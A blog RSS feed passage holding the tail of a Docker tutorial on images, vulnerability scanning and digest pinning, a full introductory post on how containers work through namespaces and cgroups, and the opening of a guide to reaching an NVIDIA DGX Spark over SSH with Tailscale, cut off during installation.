&lt;missing&gt;      6 days ago   RUN /bin/sh -c set -x &amp;&amp; addgroup -g 101...    4.51MB
&lt;missing&gt;      6 days ago   ENV NGINX_VERSION=1.29.8                        0B
&lt;missing&gt;      6 days ago   CMD ["/bin/sh"]                                 0B
&lt;missing&gt;      6 days ago   ADD alpine-minirootfs-3.23.3-aarch64.tar.gz    8.7MB
</code></pre>
<p>Read bottom-to-top. The base Alpine filesystem is 8.51 MB. The nginx install adds 40.5 MB. <code>CMD</code>, <code>ENV</code>, <code>EXPOSE</code> — those create 0-byte metadata-only layers. The <code>&lt;missing&gt;</code> entries mean those layers were built on a remote build server, which is completely normal for pulled images.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Not every Dockerfile instruction creates a layer that takes disk space. Only <code>RUN</code>, <code>COPY</code>, and <code>ADD</code> produce filesystem changes. Everything else (<code>CMD</code>, <code>ENV</code>, <code>EXPOSE</code>, <code>LABEL</code>, <code>ENTRYPOINT</code>) is metadata written into the image config JSON. When you see "0B" in <code>docker history</code>, that's why.</p>
</blockquote>
<hr />
<h2>The Supply Chain Problem</h2>
<p>Images come from registries. Registries can be compromised. And in March 2026, they were.</p>
<p>Attackers pushed backdoored versions of the Trivy vulnerability scanner to Docker Hub. Trivy — the tool that organizations run in their CI/CD pipelines to <em>detect</em> compromised images — was itself compromised. The backdoored images exfiltrated environment variables, secrets, and CI tokens from every pipeline that pulled them. Thousands of organizations were affected before the images were pulled down.</p>
<p>Think about that. The security tool was the attack vector.</p>
<p>This isn't a hypothetical. This happened. And it happened because most teams treat <code>docker pull</code> it like <code>apt install</code> - They assume the registry is trustworthy and the image is what it claims to be.</p>
<p><strong>Your images are a supply chain.</strong> Every <code>FROM</code> in your Dockerfile, every base image you pull, every tool you run in CI — it's a link in that chain. One compromised link and everything downstream is exposed.</p>
<hr />
<h2>Docker Scout: Not Optional in 2026</h2>
<p>After March 2026, image scanning is not a "nice to have." Docker Scout is built into the Docker CLI and gives you visibility into what's inside your images.</p>
<p>Start with a quick overview:</p>
<pre><code class="language-bash">docker scout quickview nginx:alpine
</code></pre>
<pre><code class="language-console"> Target             │  nginx:alpine            │    0C     2H     9M     1L     1?
   digest           │  7f7dcd27f920            │
 Base image         │  nginx:1-alpine-slim     │    0C     0H     1M     0L
 Updated base image │  nginx:1.30-alpine-slim  │    0C     0H     1M     0L
</code></pre>
<p>Zero critical. 2 high. 9 medium. This is actually a <em>good</em> result -&gt; nginx:alpine was just patched days ago. But run this same scan on an image you haven't updated in 3 months and watch the numbers explode. The point is: <strong>you wouldn't know without scanning.</strong></p>
<p>Let's dig into what's still there:</p>
<pre><code class="language-bash">docker scout cves nginx:alpine --only-severity critical,high
</code></pre>
<pre><code class="language-console">## Packages and Vulnerabilities

   0C     1H     0M     0L  nghttp2 1.68.0-r0

    ✗ HIGH CVE-2026-27135
      https://scout.docker.com/v/CVE-2026-27135
      Affected range : &lt;=1.68.0-r0
      Fixed version  : not fixed

   0C     1H     0M     0L  curl 8.17.0-r1

    ✗ HIGH CVE-2026-3805
      https://scout.docker.com/v/CVE-2026-3805
      Affected range : &lt;=8.17.0-r1
      Fixed version  : not fixed

2 vulnerabilities found in 2 packages
  CRITICAL  0
  HIGH      2
</code></pre>
<p>Even a freshly-pulled, just-patched image has 2 high-severity CVEs, and both say "not fixed" yet. These are zero-day-adjacent vulnerabilities in curl and nghttp2, sitting in every nginx:alpine container on the planet right now. Imagine what your 6-month-old base image looks like.</p>
<p>Docker Scout generates SBOMs (Software Bills of Materials), tracks CVEs across your image catalog, and integrates with CI. If you're not running this, you're flying blind.</p>
<h2>Docker Hardened Images (DHI)</h2>
<p>Docker released Hardened Images as a direct response to the supply chain crisis. Here's what they offer:</p>
<ul>
<li><p><strong>95% fewer CVEs</strong> compared to standard Docker Hub images</p>
</li>
<li><p><strong>Rootless by default</strong> - no process runs as root</p>
</li>
<li><p><strong>Distroless runtime</strong> - minimal attack surface, no shell, no package manager</p>
</li>
<li><p><strong>7-day fix guarantee</strong> - critical CVEs patched within a week</p>
</li>
<li><p><strong>1000+ images</strong> available and growing</p>
</li>
<li><p><strong>Free and open source</strong> under Apache 2.0</p>
</li>
</ul>
<p>In practice, switching from <code>nginx:alpine</code> to a Docker Hardened Image means you inherit a fraction of the vulnerability surface. For anything running in production, DHI should be your default starting point.</p>
<blockquote>
<p><strong>Pro Tip:</strong> DHI images are distroless at runtime - there is no shell to <code>docker exec</code> into for debugging. During development, use the standard image. In your production Dockerfile stage, switch to the DHI variant. Multi-stage builds (Day 3) make this trivial.</p>
</blockquote>
<hr />
<h2>Image Naming - More Than You Think</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/b59d276b-d277-48f4-83fb-84224ee0dc92.png" alt="" style="display:block;margin:0 auto" />

<p>The full format of an image reference:</p>
<pre><code class="language-plaintext">registry/namespace/repository:tag@sha256:digest
</code></pre>
<table>
<thead>
<tr>
<th>Component</th>
<th>Example</th>
<th>Default</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Registry</strong></td>
<td><code>docker.io</code>, <code>ghcr.io</code>, <code>123456.dkr.ecr.us-east-1.amazonaws.com</code></td>
<td><code>docker.io</code></td>
</tr>
<tr>
<td><strong>Namespace</strong></td>
<td><code>library</code> (official), <code>myuser</code>, <code>myorg</code></td>
<td><code>library</code></td>
</tr>
<tr>
<td><strong>Repository</strong></td>
<td><code>nginx</code>, <code>redis</code>, <code>myapp</code></td>
<td><em>(required)</em></td>
</tr>
<tr>
<td><strong>Tag</strong></td>
<td><code>alpine</code>, <code>1.29.3</code>, <code>latest</code></td>
<td><code>latest</code></td>
</tr>
<tr>
<td><strong>Digest</strong></td>
<td><code>sha256:4ff102e6b2d5f84...</code></td>
<td><em>(none)</em></td>
</tr>
</tbody></table>
<p>These are all equivalent:</p>
<pre><code class="language-plaintext">nginx
nginx:latest
library/nginx:latest
docker.io/library/nginx:latest
</code></pre>
<p>Tags are <strong>mutable</strong>. Digests are <strong>immutable</strong>. This distinction matters more than almost anything else in this post.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> An image tagged <code>:latest</code> today and <code>:latest</code> tomorrow can be completely different binaries. Tags are pointers that can be moved. Anyone with push access can retag an image at any time. Digests are content hashes that cannot be faked. In production, pin <code>sha256</code> digests. In the March 2026 Trivy attack, the malicious images were pushed under <em>existing tags</em> — anyone pulling by tag got the backdoor. Anyone pinning by digest was unaffected.</p>
</blockquote>
<hr />
<h2>Hands-On: Inspect, Scan, Understand</h2>
<p>Let's put it all together. Run these commands and understand what each one tells you.</p>
<p><strong>Check what's on disk:</strong></p>
<pre><code class="language-bash">docker images --format "table {{.Repository}}\t{{.Tag}}\t{{.Size}}" | head -15
</code></pre>
<pre><code class="language-console">REPOSITORY    TAG         SIZE
node          20-alpine   136MB
nginx         alpine      53.4MB
ubuntu        latest      101MB
hello-world   latest      5.2kB
alpine        latest      8.51MB
redis         7-alpine    41.7MB
</code></pre>
<p>Alpine is 8.51 MB. Ubuntu is 101 MB. For a base image, that's a 12x difference in attack surface before you've installed anything.</p>
<p><strong>Check disk usage across all Docker resources:</strong></p>
<pre><code class="language-bash">docker system df
</code></pre>
<pre><code class="language-console">TYPE            TOTAL     ACTIVE    SIZE      RECLAIMABLE
Images          86        17        22.49GB   5.294GB (23%)
Containers      41        0         366MB     366MB (100%)
Local Volumes   14        5         1.721GB   1.676GB (97%)
Build Cache     56        0         1.926GB   278.2kB
</code></pre>
<p>22.49 GB in images. 41 stopped containers taking 366 MB. 1.9 GB of build cache. Run <code>docker system prune -a</code> periodically, or this grows without bound.</p>
<p><strong>Pull process visualized:</strong></p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/4c326005-1f16-49e5-966d-35c33d39ac27.png" alt="" style="display:block;margin:0 auto" />

<p>When you <code>docker pull nginx:alpine</code>:</p>
<ol>
<li><p>Docker resolves <code>nginx:alpine</code> to <code>docker.io/library/nginx:alpine</code></p>
</li>
<li><p>Contacts the registry, fetches the manifest</p>
</li>
<li><p>Checks each layer against local storage</p>
</li>
<li><p>Downloads missing layers in parallel (compressed)</p>
</li>
<li><p>Verifies every layer's SHA256 digest</p>
</li>
<li><p>Assembles the image locally</p>
</li>
</ol>
<p>If any digest doesn't match, the pull fails. This is content-addressable storage doing its job - but it only protects you against tampering <em>in transit</em>, not a compromised image at the source.</p>
<blockquote>
<p><strong>Pro Tip:</strong> Need to pull for a different architecture? Use <code>--platform</code>: <code>docker pull --platform linux/amd64 nginx:alpine</code>. This is common when building on Apple Silicon for amd64 deployment targets.</p>
</blockquote>
<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker pull nginx:alpine</code></td>
<td>Download image from registry</td>
</tr>
<tr>
<td><code>docker images</code></td>
<td>List local images</td>
</tr>
<tr>
<td><code>docker history nginx:alpine</code></td>
<td>Show layers and their sizes</td>
</tr>
<tr>
<td><code>docker inspect nginx:alpine</code></td>
<td>Full JSON metadata</td>
</tr>
<tr>
<td><code>docker scout quickview nginx:alpine</code></td>
<td>Vulnerability summary</td>
</tr>
<tr>
<td><code>docker scout cves nginx:alpine</code></td>
<td>Detailed CVE listing</td>
</tr>
<tr>
<td><code>docker system df</code></td>
<td>Disk usage breakdown</td>
</tr>
<tr>
<td><code>docker image prune -a</code></td>
<td>Remove all unused images</td>
</tr>
<tr>
<td><code>docker system prune -a</code></td>
<td>Full cleanup (images, containers, cache)</td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th>Concept</th>
<th>Key Point</th>
</tr>
</thead>
<tbody><tr>
<td><strong>OCI image</strong></td>
<td>A manifest + blobs + config, not a single file</td>
</tr>
<tr>
<td><strong>Layers</strong></td>
<td>Filesystem diffs, content-addressed, shared across images</td>
</tr>
<tr>
<td><strong>Tags</strong></td>
<td>Mutable pointers — can change at any time</td>
</tr>
<tr>
<td><strong>Digests</strong></td>
<td>Immutable content hashes — pin these in production</td>
</tr>
<tr>
<td><strong>Docker Scout</strong></td>
<td>Scan images, generate SBOMs, catch CVEs before deploy</td>
</tr>
<tr>
<td><strong>DHI</strong></td>
<td>Hardened images: 95% fewer CVEs, rootless, distroless, free</td>
</tr>
<tr>
<td><strong>Copy-on-write</strong></td>
<td>Containers share image layers, writes go to the writable layer</td>
</tr>
</tbody></table>
<hr />
<h2>What's Next: Day 3</h2>
<p>You now know what images are, how the supply chain works, and why scanning is non-negotiable. But you've only pulled images other people built.</p>
<p>On <strong>Day 3: Building Images with Dockerfiles</strong>, you'll write your own. You'll learn the build cache, layer ordering, multi-stage builds, and how to produce images that are small, fast, and don't ship with a shell an attacker can use.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[Day 1: What Actually Happens When You Type docker run]]></title><description><![CDATA[7 Days of Docker (2026) — A Docker Captain's guide. Not your average tutorial.

I'm a Docker Captain. I've seen many Docker tutorials on the internet. And they all start the same way:
"Docker is like ]]></description><link>https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run</guid><category><![CDATA[Docker]]></category><category><![CDATA[containers]]></category><category><![CDATA[Devops]]></category><category><![CDATA[cloud native]]></category><category><![CDATA[Linux]]></category><category><![CDATA[docker desktop]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Wed, 22 Apr 2026 10:38:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/2f51276b-c5fb-4038-ac4d-939c7cbb4816.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> — A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>I'm a Docker Captain. I've seen many Docker tutorials on the internet. And they all start the same way:</p>
<p><em>"Docker is like a virtual machine, but lighter..."</em></p>
<p>No. Let's stop doing that.</p>
<p>I'm going to explain Docker the way I wish someone had explained it to me — from the inside out. No VM comparisons. No shipping container analogies. Just what's actually happening on your machine right now.</p>
<hr />
<h2>A Container Is Just a Process</h2>
<p>That's it. That's the tweet.</p>
<p>When you run <code>docker run nginx</code>, you're not spinning up a virtual machine. You're not creating a miniature computer. You're starting a <strong>Linux process</strong> — the nginx binary — with two restrictions:</p>
<ol>
<li><p><strong>It can only SEE certain things</strong> (namespaces)</p>
</li>
<li><p><strong>It can only USE certain resources</strong> (cgroups)</p>
</li>
</ol>
<p>That's a container. A restricted process. Let me prove it.</p>
<pre><code class="language-bash">docker run -d --name my-nginx nginx:alpine
</code></pre>
<p>Now let's look at it from the host's perspective:</p>
<pre><code class="language-bash">docker top my-nginx
</code></pre>
<pre><code class="language-console">UID    PID    PPID   C   STIME   TTY   TIME       CMD
root   15290  15267  0   09:31   ?     00:00:00   nginx: master process nginx -g daemon off;
statd  15327  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15328  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15329  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15330  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15331  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15332  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15333  15290  0   09:31   ?     00:00:00   nginx: worker process
statd  15334  15290  0   09:31   ?     00:00:00   nginx: worker process
</code></pre>
<p>See those PIDs? Those are <strong>regular processes</strong> on your machine. One master, eight workers (one per CPU core on this M2). They show up in the process table just like any other program. They're not in a VM. They're not in a sandbox. They're processes.</p>
<p>So what makes it a "container"?</p>
<hr />
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/73100fa4-d224-4148-94e3-bf8709fe5824.png" alt="" style="display:block;margin:0 auto" />

<h2>The Two Ingredients: Namespaces and Cgroups</h2>
<h3>Namespaces: What the process can SEE</h3>
<p>Linux namespaces are walls. They control what a process is allowed to perceive:</p>
<table>
<thead>
<tr>
<th>Namespace</th>
<th>What it hides</th>
</tr>
</thead>
<tbody><tr>
<td><strong>PID</strong></td>
<td>Other processes — the container thinks it's PID 1</td>
</tr>
<tr>
<td><strong>NET</strong></td>
<td>The host's network — the container gets its own IP</td>
</tr>
<tr>
<td><strong>MNT</strong></td>
<td>The host's filesystem — the container sees only its own files</td>
</tr>
<tr>
<td><strong>UTS</strong></td>
<td>The hostname — the container has its own hostname</td>
</tr>
<tr>
<td><strong>IPC</strong></td>
<td>Inter-process communication — isolated shared memory</td>
</tr>
<tr>
<td><strong>USER</strong></td>
<td>User IDs — root inside the container isn't root outside</td>
</tr>
</tbody></table>
<p>When you're "inside" a container and type <code>ps aux</code>, you see maybe 2-3 processes. On the host, there are hundreds. The container doesn't know that. Its PID namespace hides everything else.</p>
<p>The container isn't isolated because it's in a separate machine. It's isolated because <strong>the kernel lies to it</strong>.</p>
<h3>Cgroups: What the process can USE</h3>
<p>Control groups limit resources:</p>
<pre><code class="language-bash">docker run --memory=128m --cpus=0.5 nginx:alpine
</code></pre>
<p>This process can never use more than 128MB of RAM or half a CPU core. The kernel enforces this. The container starts and runs fine — nginx barely uses 10MB. But if it ever tries to allocate <em>beyond</em> 128MB, the kernel OOM-kills it. The limit is a ceiling, not a cage. Most processes never hit it. But a memory leak or a traffic spike that exhausts the limit? The process dies instantly. That's the point — one runaway container can't take down the entire host.</p>
<pre><code class="language-console">$ docker run --rm --memory=128m alpine cat /sys/fs/cgroup/memory.max
134217728
</code></pre>
<p>134,217,728 bytes. Exactly 128 megabytes. The kernel sets this limit at the cgroup level, and the process can never escape it.</p>
<blockquote>
<p><strong>That's it.</strong> Namespaces + Cgroups = Container. Docker didn't invent containers. Docker made them usable.</p>
</blockquote>
<hr />
<h2>So What Does Docker Actually Do?</h2>
<p>If containers are just kernel features, why do we need Docker?</p>
<p>Because doing this manually is miserable. Without Docker, to "containerize" a process, you'd need to:</p>
<ul>
<li><p>Call <code>unshare()</code> and <code>clone()</code> system calls to create namespaces</p>
</li>
<li><p>Set up cgroup hierarchies in <code>/sys/fs/cgroup/</code></p>
</li>
<li><p>Build a root filesystem by hand</p>
</li>
<li><p>Configure networking with <code>veth</code> pairs and <code>iptables</code></p>
</li>
<li><p>Handle image distribution yourself</p>
</li>
</ul>
<p>Docker wraps all of this into one command:</p>
<pre><code class="language-bash">docker run -d -p 8080:80 nginx:alpine
</code></pre>
<p>One line. Docker:</p>
<ol>
<li><p>Pulls the <code>nginx:alpine</code> image (a packaged filesystem)</p>
</li>
<li><p>Creates namespaces (PID, NET, MNT, UTS, IPC)</p>
</li>
<li><p>Sets up cgroups for resource limits</p>
</li>
<li><p>Configures a virtual network interface</p>
</li>
<li><p>Mounts the image as a layered filesystem</p>
</li>
<li><p>Starts the process</p>
</li>
</ol>
<pre><code class="language-console">$ docker run -d --name day1-nginx -p 8080:80 nginx:alpine
a45dc5a898449edc5e4ecfbca6fc3c22db6f77901e1114f26057c45ff3dacaa7

$ curl -s http://localhost:8080 | head -3
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
</code></pre>
<p>A web server. Running. In under a second. That hash? It's the container ID — a unique identifier for this particular set of namespaces and cgroups.</p>
<hr />
<h2>"But Wait — I'm on a Mac"</h2>
<p>Here's something most tutorials never tell you:</p>
<p><strong>Containers are a Linux kernel feature. macOS doesn't have a Linux kernel.</strong></p>
<p>So how is Docker running on your Mac right now?</p>
<pre><code class="language-console">$ docker version
Client:
 Version:    29.1.5
 OS/Arch:    darwin/arm64

Server: Docker Desktop 4.58.1
 Engine:
  Version:   29.1.5
  OS/Arch:   linux/arm64
</code></pre>
<p>See that? Client: <code>darwin/arm64</code> (your Mac). Server: <code>linux/arm64</code> (not your Mac).</p>
<p>Docker Desktop runs a <strong>lightweight Linux virtual machine</strong> in the background. On Apple Silicon Macs, you get two choices for the Virtual Machine Manager (VMM):</p>
<ul>
<li><p><strong>Apple Virtualization framework</strong> — the stable, well-established option that leverages Apple's native hypervisor. This is what most people use (and what I'm running right now).</p>
</li>
<li><p><strong>Docker VMM</strong> (Beta) — Docker's own container-optimized hypervisor, built specifically for Apple Silicon. Promises better performance for container workloads.</p>
</li>
</ul>
<p>Both options also let you enable <strong>Rosetta for x86_64/amd64 emulation</strong> — so you can run Intel-based images on your ARM Mac without QEMU. And for file sharing between Mac and the Linux VM, you choose between <strong>VirtioFS</strong> (fastest, recommended), gRPC FUSE, or osxfs (legacy).</p>
<p>Your containers live inside this Linux VM. The flow:</p>
<ol>
<li><p>You type <code>docker run</code> on your Mac (the client)</p>
</li>
<li><p>The command goes to the Docker daemon inside the Linux VM (the server)</p>
</li>
<li><p>The daemon creates namespaces and cgroups in that Linux kernel</p>
</li>
<li><p>Your container runs inside the VM</p>
</li>
</ol>
<p>You never see the VM. You never configure it. But it's there. On a Linux server? No VM needed — containers talk directly to the host kernel.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/7311b493-e073-45c3-a6f4-14c1b0e1c26b.png" alt="" style="display:block;margin:0 auto" />

<blockquote>
<p><strong>What Nobody Tells You:</strong> Your Mac's fan spinning during Docker builds? That's the Linux VM doing the work. The VM has allocated CPU and memory from your Mac. If you're running 10 containers, they're all sharing one VM — not 10 separate machines. This is why Docker on Mac will never be as fast as Docker on Linux. The VM is the tax you pay.</p>
</blockquote>
<blockquote>
<p><strong>2026 Update:</strong> Apple released their own container tool — <a href="https://github.com/apple/container">Apple Containers</a> — which takes the opposite approach: one lightweight VM per container instead of one shared VM. It boots in sub-second, has stronger isolation, and is written in Swift. It's interesting for macOS-native workflows, but Docker remains the standard for production, CI/CD, and cross-platform builds.</p>
</blockquote>
<hr />
<h2>Your First Containers (For Real This Time)</h2>
<p>Let's actually do this. Not <code>hello-world</code> — that's a toy. Let's run real software.</p>
<h3>Run an entire operating system</h3>
<pre><code class="language-bash">docker run --rm ubuntu bash -c "cat /etc/os-release &amp;&amp; uname -a"
</code></pre>
<pre><code class="language-console">PRETTY_NAME="Ubuntu 24.04.1 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.1 LTS (Noble Numbat)"
VERSION_CODENAME=noble
Linux d50e9bad40e9 6.12.65-linuxkit #1 SMP Thu Jan 15 14:58:53 UTC 2026 aarch64 aarch64 aarch64 GNU/Linux
</code></pre>
<p>Look at that kernel version: <code>6.12.65-linuxkit</code>. That's the Linux VM's kernel. The Ubuntu "operating system" inside the container is sharing this kernel. There's no second kernel. Ubuntu here is just a filesystem — the binaries, libraries, and configs that make Ubuntu <em>Ubuntu</em>. The kernel comes from the host (or the VM on Mac).</p>
<p>This is why containers start in milliseconds instead of minutes. There's no OS to boot. It's just a process with a different filesystem view.</p>
<h3>Run a web server</h3>
<pre><code class="language-bash">docker run -d --name web -p 8080:80 nginx:alpine
</code></pre>
<pre><code class="language-console">$ docker ps
CONTAINER ID   IMAGE          STATUS         PORTS                                     NAMES
a45dc5a89844   nginx:alpine   Up 26 seconds  0.0.0.0:8080-&gt;80/tcp, [::]:8080-&gt;80/tcp   web
</code></pre>
<pre><code class="language-bash">curl -s http://localhost:8080 | head -5
</code></pre>
<pre><code class="language-console">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
</code></pre>
<p>That <code>-p 8080:80</code> is port mapping. The container's nginx listens on port 80 inside its <strong>network namespace</strong>. Docker maps your host's port 8080 to it. Traffic flows: your browser → host port 8080 → Docker networking → container port 80 → nginx process.</p>
<h3>Check what's happening inside</h3>
<pre><code class="language-bash">docker logs web
</code></pre>
<pre><code class="language-console">/docker-entrypoint.sh: Configuration complete; ready for start up
2026/04/12 08:10:22 [notice] 1#1: using the "epoll" event method
</code></pre>
<p>Logs. Real logs from the nginx process. Because that's all a container is — a process.</p>
<h3>Clean up</h3>
<pre><code class="language-bash">docker stop web &amp;&amp; docker rm web
</code></pre>
<p>Container stopped (process received SIGTERM). Container removed (namespaces and cgroups cleaned up). The filesystem? Gone too, unless you used a volume. We'll cover that on Day 4.</p>
<hr />
<h2>2026: Docker Isn't Just Containers Anymore</h2>
<p>Here's what separates learning Docker today from learning it in 2020.</p>
<h3><code>docker init</code> — Never write a Dockerfile from scratch</h3>
<pre><code class="language-bash">cd your-project/
docker init
</code></pre>
<p>Docker scans your project, detects the language (Python, Node.js, Go, Java, .NET), and generates a production-ready Dockerfile, compose.yaml, and .dockerignore. Multi-stage builds. Non-root users. Health checks. All generated in seconds.</p>
<h3><code>docker ai</code> — Ask Gordon</h3>
<pre><code class="language-bash">docker ai "How do I containerize a Flask app with Redis?"
</code></pre>
<p>Gordon is Docker's built-in AI assistant. It reads your project structure, your Dockerfile, your running containers — and gives you answers that actually understand your context. Not generic advice. Specific to your setup.</p>
<h3><code>docker model</code> — Run LLMs locally</h3>
<pre><code class="language-console">$ docker model status
Docker Model Runner is running

$ docker model list
MODEL NAME  PARAMETERS  QUANTIZATION    ARCHITECTURE  SIZE
smollm2     361.82 M    IQ2_XXS/Q4_K_M  llama         256.35 MiB
</code></pre>
<p>Docker Model Runner lets you pull and run AI models the way you pull Docker images. Powered by llama.cpp, exposed via OpenAI-compatible API, GPU-accelerated on Apple Silicon. Think of it as <code>docker run</code> but for LLMs. We'll deep-dive on Day 6.</p>
<h3><code>docker scout</code> — Know your vulnerabilities</h3>
<pre><code class="language-bash">docker scout quickview nginx:latest
</code></pre>
<p>Every image has dependencies. Dependencies have CVEs. Docker Scout scans layers, generates SBOMs (Software Bill of Materials), and shows you what's exposed. In March 2026, compromised Trivy images on Docker Hub stole CI/CD secrets from thousands of pipelines. Security scanning isn't optional anymore.</p>
<h3><code>docker debug</code> — Shell into anything</h3>
<pre><code class="language-bash">docker debug my-broken-container
</code></pre>
<p>Container has no shell? No curl? No debugging tools? <code>docker debug</code> injects a full toolbox into any container or image — even distroless, even crashing. It brings vim, curl, htop, and more. You can install additional tools on the fly.</p>
<hr />
<h2>What You Actually Learned Today</h2>
<p>Not "Docker is like a lightweight VM." You learned:</p>
<ul>
<li><p><strong>A container is a Linux process</strong> restricted by namespaces (what it can see) and cgroups (what it can use)</p>
</li>
<li><p><strong>Docker automates</strong> the creation of these restrictions, plus image management, networking, and storage</p>
</li>
<li><p><strong>On Mac</strong>, Docker runs a Linux VM because macOS has no Linux kernel — your containers live inside that VM</p>
</li>
<li><p><strong>In 2026</strong>, Docker is also an AI platform: Model Runner for local LLMs, Gordon for AI assistance, Scout for security scanning, Debug for troubleshooting, Init for project scaffolding</p>
</li>
</ul>
<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What it does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker run -d -p 8080:80 nginx</code></td>
<td>Start a process with namespaces + port mapping</td>
</tr>
<tr>
<td><code>docker ps</code></td>
<td>List running container processes</td>
</tr>
<tr>
<td><code>docker logs &lt;name&gt;</code></td>
<td>View stdout/stderr of the process</td>
</tr>
<tr>
<td><code>docker top &lt;name&gt;</code></td>
<td>Show the actual PIDs on the host</td>
</tr>
<tr>
<td><code>docker stop &lt;name&gt;</code></td>
<td>Send SIGTERM to the process</td>
</tr>
<tr>
<td><code>docker rm &lt;name&gt;</code></td>
<td>Clean up namespaces, cgroups, filesystem</td>
</tr>
<tr>
<td><code>docker init</code></td>
<td>Generate Dockerfile for your project</td>
</tr>
<tr>
<td><code>docker ai "question"</code></td>
<td>Ask Gordon, Docker's AI assistant</td>
</tr>
<tr>
<td><code>docker model list</code></td>
<td>List locally available AI models</td>
</tr>
<tr>
<td><code>docker scout quickview &lt;image&gt;</code></td>
<td>Scan image for vulnerabilities</td>
</tr>
<tr>
<td><code>docker debug &lt;name&gt;</code></td>
<td>Shell into any container, even distroless</td>
</tr>
</tbody></table>
<hr />
<h2>Tomorrow: Day 2</h2>
<p>We're looking at images — not just "layers" but what they actually are: OCI artifacts containing filesystem snapshots. Why your images probably have dozens of vulnerabilities. How Docker Scout and Hardened Images change the game. And why the Trivy supply chain attack of March 2026 means security scanning is no longer optional.</p>
]]></content:encoded></item><item><title><![CDATA[SSH Into Your DGX Spark From Anywhere in the World Using Tailscale
]]></title><description><![CDATA[I recently got my hands on an NVIDIA DGX Spark, and the first thing I wanted to figure out was: how do I access this thing from anywhere? Whether I'm at a coffee shop, at a conference, or on a differe]]></description><link>https://blog.kubesimplify.com/ssh-into-your-dgx-spark-from-anywhere-in-the-world-using-tailscale</link><guid isPermaLink="true">https://blog.kubesimplify.com/ssh-into-your-dgx-spark-from-anywhere-in-the-world-using-tailscale</guid><category><![CDATA[NVIDIA]]></category><category><![CDATA[tailscale]]></category><category><![CDATA[DGXSpark]]></category><category><![CDATA[ssh]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 07 Apr 2026 12:01:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/73a73de4-7383-44be-8853-78e3cf47b306.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
<p>I recently got my hands on an NVIDIA DGX Spark, and the first thing I wanted to figure out was: <strong>how do I access this thing from anywhere?</strong> Whether I'm at a coffee shop, at a conference, or on a different network entirely — I want to just <code>ssh</code> in and get to work.</p>
<p>The answer? <strong>Tailscale.</strong> It took me about 10 minutes to set up, and now I can SSH into my Spark from any device, on any network, anywhere in the world. I even set up a friend with access — simultaneously — without giving them my credentials. Here's exactly how I did it.</p>
<h2>Why Tailscale?</h2>
<p>Tailscale creates a private mesh network (called a "tailnet") between your devices. No port forwarding, no static IPs, no VPN server to maintain. You install it on your devices, log in with the same account, and they can talk to each other. It's built on WireGuard, so it's fast and encrypted.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/471fb562-c707-46de-a4e1-a157f818ca08.png" alt="" style="display:block;margin:0 auto" />

<p>For the DGX Spark, this means:</p>
<ul>
<li><p>No need to be on the same WiFi network</p>
</li>
<li><p>No need to mess with your router settings</p>
</li>
<li><p>Works behind NATs and firewalls</p>
</li>
<li><p>Encrypted end-to-end</p>
</li>
</ul>
<h2>Prerequisites</h2>
<p>Before starting, make sure your DGX Spark:</p>
<ul>
<li><p>Is running Ubuntu 24.04 or newer</p>
</li>
<li><p>Has internet connectivity</p>
</li>
<li><p>You have sudo access</p>
</li>
</ul>
<p>Here's what my system looked like:</p>
<pre><code class="language-bash">$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 24.04.3 LTS
Release:    24.04
Codename:    noble
</code></pre>
<p>A quick ping to confirm internet:</p>
<pre><code class="language-bash">$ ping -c 3 google.com
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=1 ttl=118 time=15.3 ms
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=2 ttl=118 time=13.7 ms
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=3 ttl=118 time=17.2 ms

--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss
</code></pre>
<p>And verify sudo access:</p>
<pre><code class="language-bash">$ sudo whoami
root
</code></pre>
<p>Good to go.</p>
<h2>Step 1: Install Tailscale on the DGX Spark</h2>
<p>SSH into your Spark (or use a directly connected keyboard/monitor) and run:</p>
<pre><code class="language-bash"># Update package list and install prerequisites
sudo apt update
sudo apt install -y curl gnupg

# Add Tailscale signing key
curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.noarmor.gpg | \
